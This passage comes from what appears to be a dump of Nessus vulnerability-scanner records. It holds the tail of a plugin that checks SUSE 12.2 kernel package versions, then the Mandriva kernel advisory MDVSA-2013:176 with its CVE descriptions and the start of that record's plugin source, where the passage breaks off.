reference:\"kernel-ec2-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-base-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-base-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-extra-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-extra-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-pae-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-pae-base-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-pae-base-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-pae-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-pae-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-pae-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-pae-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-trace-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-trace-base-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-trace-base-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-trace-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-trace-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-trace-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-trace-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-vanilla-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-vanilla-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-vanilla-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-vanilla-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-vanilla-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-xen-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-xen-base-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-xen-base-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-xen-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-xen-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-xen-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-xen-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-debug-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-debug-base-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-debug-base-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-debug-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-debug-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-desktop-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-desktop-base-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-desktop-base-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-desktop-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-desktop-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-desktop-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-desktop-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-base-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-base-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-extra-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-extra-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-pae-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-pae-base-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-pae-base-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-pae-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-pae-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-pae-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-pae-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-trace-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-trace-base-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-trace-base-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-trace-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-trace-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-trace-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-trace-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-vanilla-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-vanilla-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-vanilla-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-vanilla-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-vanilla-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-xen-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-xen-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:54:13", "description": "Multiple vulnerabilities has been found and corrected in the Linux\nkernel :\n\nThe scm_set_cred function in include/net/scm.h in the Linux kernel\nbefore 3.8.11 uses incorrect uid and gid values during credentials\npassing, which allows local users to gain privileges via a crafted\napplication. (CVE-2013-1979)\n\nThe nr_recvmsg function in net/netrom/af_netrom.c in the Linux kernel\nbefore 3.9-rc7 does not initialize a certain data structure, which\nallows local users to obtain sensitive information from kernel stack\nmemory via a crafted recvmsg or recvfrom system call. (CVE-2013-3232)\n\nnet/tipc/socket.c in the Linux kernel before 3.9-rc7 does not\ninitialize a certain data structure and a certain length variable,\nwhich allows local users to obtain sensitive information from kernel\nstack memory via a crafted recvmsg or recvfrom system call.\n(CVE-2013-3235)\n\nThe rose_recvmsg function in net/rose/af_rose.c in the Linux kernel\nbefore 3.9-rc7 does not initialize a certain data structure, which\nallows local users to obtain sensitive information from kernel stack\nmemory via a crafted recvmsg or recvfrom system call. (CVE-2013-3234)\n\nThe llcp_sock_recvmsg function in net/nfc/llcp/sock.c in the Linux\nkernel before 3.9-rc7 does not initialize a certain length variable\nand a certain data structure, which allows local users to obtain\nsensitive information from kernel stack memory via a crafted recvmsg\nor recvfrom system call. (CVE-2013-3233)\n\nThe llc_ui_recvmsg function in net/llc/af_llc.c in the Linux kernel\nbefore 3.9-rc7 does not initialize a certain length variable, which\nallows local users to obtain sensitive information from kernel stack\nmemory via a crafted recvmsg or recvfrom system call. (CVE-2013-3231)\n\nThe iucv_sock_recvmsg function in net/iucv/af_iucv.c in the Linux\nkernel before 3.9-rc7 does not initialize a certain length variable,\nwhich allows local users to obtain sensitive information from kernel\nstack memory via a crafted recvmsg or recvfrom system call.\n(CVE-2013-3229)\n\nThe irda_recvmsg_dgram function in net/irda/af_irda.c in the Linux\nkernel before 3.9-rc7 does not initialize a certain length variable,\nwhich allows local users to obtain sensitive information from kernel\nstack memory via a crafted recvmsg or recvfrom system call.\n(CVE-2013-3228)\n\nThe caif_seqpkt_recvmsg function in net/caif/caif_socket.c in the\nLinux kernel before 3.9-rc7 does not initialize a certain length\nvariable, which allows local users to obtain sensitive information\nfrom kernel stack memory via a crafted recvmsg or recvfrom system\ncall. (CVE-2013-3227)\n\nThe rfcomm_sock_recvmsg function in net/bluetooth/rfcomm/sock.c in the\nLinux kernel before 3.9-rc7 does not initialize a certain length\nvariable, which allows local users to obtain sensitive information\nfrom kernel stack memory via a crafted recvmsg or recvfrom system\ncall. (CVE-2013-3225)\n\nThe bt_sock_recvmsg function in net/bluetooth/af_bluetooth.c in the\nLinux kernel before 3.9-rc7 does not properly initialize a certain\nlength variable, which allows local users to obtain sensitive\ninformation from kernel stack memory via a crafted recvmsg or recvfrom\nsystem call. (CVE-2013-3224)\n\nThe ax25_recvmsg function in net/ax25/af_ax25.c in the Linux kernel\nbefore 3.9-rc7 does not initialize a certain data structure, which\nallows local users to obtain sensitive information from kernel stack\nmemory via a crafted recvmsg or recvfrom system call. (CVE-2013-3223)\n\nThe vcc_recvmsg function in net/atm/common.c in the Linux kernel\nbefore 3.9-rc7 does not initialize a certain length variable, which\nallows local users to obtain sensitive information from kernel stack\nmemory via a crafted recvmsg or recvfrom system call. (CVE-2013-3222)\n\nInteger overflow in the fb_mmap function in drivers/video/fbmem.c in\nthe Linux kernel before 3.8.9, as used in a certain Motorola build of\nAndroid 4.1.2 and other products, allows local users to create a\nread-write memory mapping for the entirety of kernel memory, and\nconsequently gain privileges, via crafted /dev/graphics/fb0 mmap2\nsystem calls, as demonstrated by the Motochopper pwn program.\n(CVE-2013-2596)\n\narch/x86/kernel/cpu/perf_event_intel.c in the Linux kernel before\n3.8.9, when the Performance Events Subsystem is enabled, specifies an\nincorrect bitmask, which allows local users to cause a denial of\nservice (general protection fault and system crash) by attempting to\nset a reserved bit. (CVE-2013-2146)\n\nThe perf_swevent_init function in kernel/events/core.c in the Linux\nkernel before 3.8.9 uses an incorrect integer data type, which allows\nlocal users to gain privileges via a crafted perf_event_open system\ncall. (CVE-2013-2094)\n\nThe ioapic_read_indirect function in virt/kvm/ioapic.c in the Linux\nkernel through 3.8.4 does not properly handle a certain combination of\ninvalid IOAPIC_REG_SELECT and IOAPIC_REG_WINDOW operations, which\nallows guest OS users to obtain sensitive information from host OS\nmemory or cause a denial of service (host OS OOPS) via a crafted\napplication. (CVE-2013-1798)\n\nUse-after-free vulnerability in arch/x86/kvm/x86.c in the Linux kernel\nthrough 3.8.4 allows guest OS users to cause a denial of service (host\nOS memory corruption) or possibly have unspecified other impact via a\ncrafted application that triggers use of a guest physical address\n(GPA) in (1) movable or (2) removable memory during an\nMSR_KVM_SYSTEM_TIME kvm_set_msr_common operation. (CVE-2013-1797)\n\nThe kvm_set_msr_common function in arch/x86/kvm/x86.c in the Linux\nkernel through 3.8.4 does not ensure a required time_page alignment\nduring an MSR_KVM_SYSTEM_TIME operation, which allows guest OS users\nto cause a denial of service (buffer overflow and host OS memory\ncorruption) or possibly have unspecified other impact via a crafted\napplication. (CVE-2013-1796)\n\nThe do_tkill function in kernel/signal.c in the Linux kernel before\n3.8.9 does not initialize a certain data structure, which allows local\nusers to obtain sensitive information from kernel memory via a crafted\napplication that makes a (1) tkill or (2) tgkill system call.\n(CVE-2013-2141)\n\nHeap-based buffer overflow in the tg3_read_vpd function in\ndrivers/net/ethernet/broadcom/tg3.c in the Linux kernel before 3.8.6\nallows physically proximate attackers to cause a denial of service\n(system crash) or possibly execute arbitrary code via crafted firmware\nthat specifies a long string in the Vital Product Data (VPD) data\nstructure. (CVE-2013-1929)\n\nThe main function in tools/hv/hv_kvp_daemon.c in hypervkvpd, as\ndistributed in the Linux kernel before 3.8-rc1, allows local users to\ncause a denial of service (daemon exit) via a crafted application that\nsends a Netlink message. NOTE: this vulnerability exists because of an\nincorrect fix for CVE-2012-2669. (CVE-2012-5532)\n\nThe udf_encode_fh function in fs/udf/namei.c in the Linux kernel\nbefore 3.6 does not initialize a certain structure member, which\nallows local users to obtain sensitive information from kernel heap\nmemory via a crafted application. (CVE-2012-6548)\n\nThe isofs_export_encode_fh function in fs/isofs/export.c in the Linux\nkernel before 3.6 does not initialize a certain structure member,\nwhich allows local users to obtain sensitive information from kernel\nheap memory via a crafted application. (CVE-2012-6549)\n\nnet/dcb/dcbnl.c in the Linux kernel before 3.8.4 does not initialize\ncertain structures, which allows local users to obtain sensitive\ninformation from kernel stack memory via a crafted application.\n(CVE-2013-2634)\n\nThe rtnl_fill_ifinfo function in net/core/rtnetlink.c in the Linux\nkernel before 3.8.4 does not initialize a certain structure member,\nwhich allows local users to obtain sensitive information from kernel\nstack memory via a crafted application. (CVE-2013-2635)\n\nfs/ext3/super.c in the Linux kernel before 3.8.4 uses incorrect\narguments to functions in certain circumstances related to printk\ninput, which allows local users to conduct format-string attacks and\npossibly gain privileges via a crafted application. (CVE-2013-1848)\n\nThe flush_signal_handlers function in kernel/signal.c in the Linux\nkernel before 3.8.4 preserves the value of the sa_restorer field\nacross an exec operation, which makes it easier for local users to\nbypass the ASLR protection mechanism via a crafted application\ncontaining a sigaction system call. (CVE-2013-0914)\n\nHeap-based buffer overflow in the wdm_in_callback function in\ndrivers/usb/class/cdc-wdm.c in the Linux kernel before 3.8.4 allows\nphysically proximate attackers to cause a denial of service (system\ncrash) or possibly execute arbitrary code via a crafted cdc-wdm USB\ndevice. (CVE-2013-1860)\n\nRace condition in the install_user_keyrings function in\nsecurity/keys/process_keys.c in the Linux kernel before 3.8.3 allows\nlocal users to cause a denial of service (NULL pointer dereference and\nsystem crash) via crafted keyctl system calls that trigger keyring\noperations in simultaneous threads. (CVE-2013-1792)\n\nThe report API in the crypto user configuration API in the Linux\nkernel through 3.8.2 uses an incorrect C library function for copying\nstrings, which allows local users to obtain sensitive information from\nkernel stack memory by leveraging the CAP_NET_ADMIN capability.\n(CVE-2013-2546)\n\nThe crypto_report_one function in crypto/crypto_user.c in the report\nAPI in the crypto user configuration API in the Linux kernel through\n3.8.2 does not initialize certain structure members, which allows\nlocal users to obtain sensitive information from kernel heap memory by\nleveraging the CAP_NET_ADMIN capability. (CVE-2013-2547)\n\nThe crypto_report_one function in crypto/crypto_user.c in the report\nAPI in the crypto user configuration API in the Linux kernel through\n3.8.2 uses an incorrect length value during a copy operation, which\nallows local users to obtain sensitive information from kernel memory\nby leveraging the CAP_NET_ADMIN capability. (CVE-2013-2548)\n\nThe translate_desc function in drivers/vhost/vhost.c in the Linux\nkernel before 3.7 does not properly handle cross-region descriptors,\nwhich allows guest OS users to obtain host OS privileges by leveraging\nKVM guest OS privileges. (CVE-2013-0311)\n\nArray index error in the __sock_diag_rcv_msg function in\nnet/core/sock_diag.c in the Linux kernel before 3.7.10 allows local\nusers to gain privileges via a large family value in a Netlink\nmessage. (CVE-2013-1763)\n\nThe __skb_recv_datagram function in net/core/datagram.c in the Linux\nkernel before 3.8 does not properly handle the MSG_PEEK flag with\nzero-length data, which allows local users to cause a denial of\nservice (infinite loop and system hang) via a crafted application.\n(CVE-2013-0290)\n\nUse-after-free vulnerability in the shmem_remount_fs function in\nmm/shmem.c in the Linux kernel before 3.7.10 allows local users to\ngain privileges or cause a denial of service (system crash) by\nremounting a tmpfs filesystem without specifying a required mpol (aka\nmempolicy) mount option. (CVE-2013-1767)\n\nThe xen_iret function in arch/x86/xen/xen-asm_32.S in the Linux kernel\nbefore 3.7.9 on 32-bit Xen paravirt_ops platforms does not properly\nhandle an invalid value in the DS segment register, which allows guest\nOS users to gain guest OS privileges via a crafted application.\n(CVE-2013-0228)\n\nMemory leak in drivers/net/xen-netback/netback.c in the Xen netback\nfunctionality in the Linux kernel before 3.7.8 allows guest OS users\nto cause a denial of service (memory consumption) by triggering\ncertain error conditions. (CVE-2013-0217)\n\nThe Xen netback functionality in the Linux kernel before 3.7.8 allows\nguest OS users to cause a denial of service (loop) by triggering ring\npointer corruption. (CVE-2013-0216)\n\nThe __tun_chr_ioctl function in drivers/net/tun.c in the Linux kernel\nbefore 3.6 does not initialize a certain structure, which allows local\nusers to obtain sensitive information from kernel stack memory via a\ncrafted application. (CVE-2012-6547)\n\nThe updated packages provides a solution for these security issues.", "edition": 24, "published": "2013-06-25T00:00:00", "title": "Mandriva Linux Security Advisory : kernel (MDVSA-2013:176)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5532", "CVE-2013-2635", "CVE-2013-3228", "CVE-2013-1797", "CVE-2013-1767", "CVE-2013-2596", "CVE-2012-6548", "CVE-2013-2141", "CVE-2013-2548", "CVE-2013-0228", "CVE-2013-3232", "CVE-2013-1848", "CVE-2013-1860", "CVE-2013-1763", "CVE-2013-3231", "CVE-2013-3229", "CVE-2013-1792", "CVE-2013-2546", "CVE-2012-2669", "CVE-2013-3224", "CVE-2013-3234", "CVE-2013-3233", "CVE-2013-3227", "CVE-2013-0217", "CVE-2013-1929", "CVE-2012-6547", "CVE-2013-0311", "CVE-2013-3225", "CVE-2013-1979", "CVE-2013-3222", "CVE-2013-2146", "CVE-2013-0290", "CVE-2012-6549", "CVE-2013-0914", "CVE-2013-2547", "CVE-2013-2634", "CVE-2013-2094", "CVE-2013-0216", "CVE-2013-1796", "CVE-2013-1798", "CVE-2013-3235", "CVE-2013-3223"], "modified": "2013-06-25T00:00:00", "cpe": ["cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:kernel-server-devel", "p-cpe:/a:mandriva:linux:lib64cpupower0", "p-cpe:/a:mandriva:linux:cpupower", "p-cpe:/a:mandriva:linux:kernel-firmware", "p-cpe:/a:mandriva:linux:lib64cpupower-devel", "p-cpe:/a:mandriva:linux:perf", "p-cpe:/a:mandriva:linux:kernel-source", "p-cpe:/a:mandriva:linux:kernel-server", "p-cpe:/a:mandriva:linux:kernel-headers"], "id": "MANDRIVA_MDVSA-2013-176.NASL", "href": "https://www.tenable.com/plugins/nessus/66975", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:176. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66975);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-5532\", \"CVE-2012-6547\", \"CVE-2012-6548\", \"CVE-2012-6549\", \"CVE-2013-0216\", \"CVE-2013-0217\", \"CVE-2013-0228\", \"CVE-2013-0290\", \"CVE-2013-0311\", \"CVE-2013-0914\", \"CVE-2013-1763\", \"CVE-2013-1767\", \"CVE-2013-1792\", \"CVE-2013-1796\", \"CVE-2013-1797\", \"CVE-2013-1798\", \"CVE-2013-1848\", \"CVE-2013-1860\", \"CVE-2013-1929\", \"CVE-2013-1979\", \"CVE-2013-2094\", \"CVE-2013-2141\", \"CVE-2013-2146\", \"CVE-2013-2546\", \"CVE-2013-2547\", \"CVE-2013-2548\", \"CVE-2013-2596\", \"CVE-2013-2634\", \"CVE-2013-2635\", \"CVE-2013-3222\", \"CVE-2013-3223\", \"CVE-2013-3224\", \"CVE-2013-3225\", \"CVE-2013-3227\", \"CVE-2013-3228\", \"CVE-2013-3229\", \"CVE-2013-3231\", \"CVE-2013-3232\", \"CVE-2013-3233\", \"CVE-2013-3234\", \"CVE-2013-3235\");\n script_bugtraq_id(56710, 57743, 57744, 57940, 57964, 58053, 58137, 58177, 58368, 58382, 58426, 58510, 58597, 58600, 58604, 58605, 58607, 58908, 58993, 58994, 58996, 59264, 59377, 59380, 59381, 59383, 59385, 59388, 59389, 59390, 59393, 59394, 59396, 59397, 59538, 59846, 60254, 60324);\n script_xref(name:\"MDVSA\", value:\"2013:176\");\n\n script_name(english:\"Mandriva Linux Security Advisory : kernel (MDVSA-2013:176)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities has been found and corrected in the Linux\nkernel :\n\nThe scm_set_cred function in include/net/scm.h in the Linux kernel\nbefore 3.8.11 uses incorrect uid and gid values during credentials\npassing, which allows local users to gain privileges via a crafted\napplication. (CVE-2013-1979)\n\nThe nr_recvmsg function in net/netrom/af_netrom.c in the Linux kernel\nbefore 3.9-rc7 does not initialize a certain data structure, which\nallows local users to obtain sensitive information from kernel stack\nmemory via a crafted recvmsg or recvfrom system call. (CVE-2013-3232)\n\nnet/tipc/socket.c in the Linux kernel before 3.9-rc7 does not\ninitialize a certain data structure and a certain length variable,\nwhich allows local users to obtain sensitive information from kernel\nstack memory via a crafted recvmsg or recvfrom system call.\n(CVE-2013-3235)\n\nThe rose_recvmsg function in net/rose/af_rose.c in the Linux kernel\nbefore 3.9-rc7 does not initialize a certain data structure, which\nallows local users to obtain sensitive information from kernel stack\nmemory via a crafted recvmsg or recvfrom system call. (CVE-2013-3234)\n\nThe llcp_sock_recvmsg function in net/nfc/llcp/sock.c in the Linux\nkernel before 3.9-rc7 does not initialize a certain length variable\nand a certain data structure, which allows local users to obtain\nsensitive information from kernel stack memory via a crafted recvmsg\nor recvfrom system call. (CVE-2013-3233)\n\nThe llc_ui_recvmsg function in net/llc/af_llc.c in the Linux kernel\nbefore 3.9-rc7 does not initialize a certain length variable, which\nallows local users to obtain sensitive information from kernel stack\nmemory via a crafted recvmsg or recvfrom system call. (CVE-2013-3231)\n\nThe iucv_sock_recvmsg function in net/iucv/af_iucv.c in the Linux\nkernel before 3.9-rc7 does not initialize a certain length variable,\nwhich allows local users to obtain sensitive information from kernel\nstack memory via a crafted recvmsg or recvfrom system call.\n(CVE-2013-3229)\n\nThe irda_recvmsg_dgram function in net/irda/af_irda.c in the Linux\nkernel before 3.9-rc7 does not initialize a certain length variable,\nwhich allows local users to obtain sensitive information from kernel\nstack memory via a crafted recvmsg or recvfrom system call.\n(CVE-2013-3228)\n\nThe caif_seqpkt_recvmsg function in net/caif/caif_socket.c in the\nLinux kernel before 3.9-rc7 does not initialize a certain length\nvariable, which allows local users to obtain sensitive information\nfrom kernel stack memory via a crafted recvmsg or recvfrom system\ncall. (CVE-2013-3227)\n\nThe rfcomm_sock_recvmsg function in net/bluetooth/rfcomm/sock.c in the\nLinux kernel before 3.9-rc7 does not initialize a certain length\nvariable, which allows local users to obtain sensitive information\nfrom kernel stack memory via a crafted recvmsg or recvfrom system\ncall. (CVE-2013-3225)\n\nThe bt_sock_recvmsg function in net/bluetooth/af_bluetooth.c in the\nLinux kernel before 3.9-rc7 does not properly initialize a certain\nlength variable, which allows local users to obtain sensitive\ninformation from kernel stack memory via a crafted recvmsg or recvfrom\nsystem call. (CVE-2013-3224)\n\nThe ax25_recvmsg function in net/ax25/af_ax25.c in the Linux kernel\nbefore 3.9-rc7 does not initialize a certain data structure, which\nallows local users to obtain sensitive information from kernel stack\nmemory via a crafted recvmsg or recvfrom system call. (CVE-2013-3223)\n\nThe vcc_recvmsg function in net/atm/common.c in the Linux kernel\nbefore 3.9-rc7 does not initialize a certain length variable, which\nallows local users to obtain sensitive information from kernel stack\nmemory via a crafted recvmsg or recvfrom system call. (CVE-2013-3222)\n\nInteger overflow in the fb_mmap function in drivers/video/fbmem.c in\nthe Linux kernel before 